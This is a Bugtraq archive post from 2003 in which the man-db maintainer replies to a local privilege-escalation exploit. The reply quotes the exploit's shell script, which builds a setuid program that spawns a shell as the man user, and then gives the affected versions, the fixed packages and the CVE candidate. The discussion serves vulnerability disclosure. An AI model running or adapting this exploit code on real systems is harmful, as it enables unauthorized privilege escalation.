Bugtraq mailing list archives
Re: man-db[v2.4.1-]: open_cat_stream() privileged call exploit.
From: Colin Watson <cjwatson () debian org>
Date: Fri, 08 Aug 2003 11:19:07 +0100
In article <20030806082358.2564.qmail () www securityfocus com>, Vade 79 wrote:
# man-db[v2.4.1-]: local uid=man exploit.
Correction: 2.3.12 (a beta release) and 2.3.18 to 2.4.1.
echo "[*] making runme, and mansh source files..." cat <<EOF>runme.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> int main(int argc,char **argv){ setreuid(geteuid(),geteuid()); system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh"); chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); unlink(argv[0]); exit(0); } EOF cat <<EOF>mansh.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(){ setreuid(geteuid(),geteuid()); execl("/bin/sh","sh",0); exit(0); } EOF
It can be done with a lot less effort and in about a tenth of the space without resorting to compiled code, but I'll leave that as an exercise for the reader ... :-) Anyway, Debian man-db 2.3.20-18.woody.2 (stable) and 2.4.1-12 (unstable) fix this. I'm working to release 2.4.2 as well. This is CAN-2003-0645. -- Colin Watson [cjwatson () debian org]
Current thread:
- man-db[v2.4.1-]: open_cat_stream() privileged call exploit. Vade 79 (Aug 06)
- Re: man-db[v2.4.1-]: open_cat_stream() privileged call exploit. Colin Watson (Aug 08)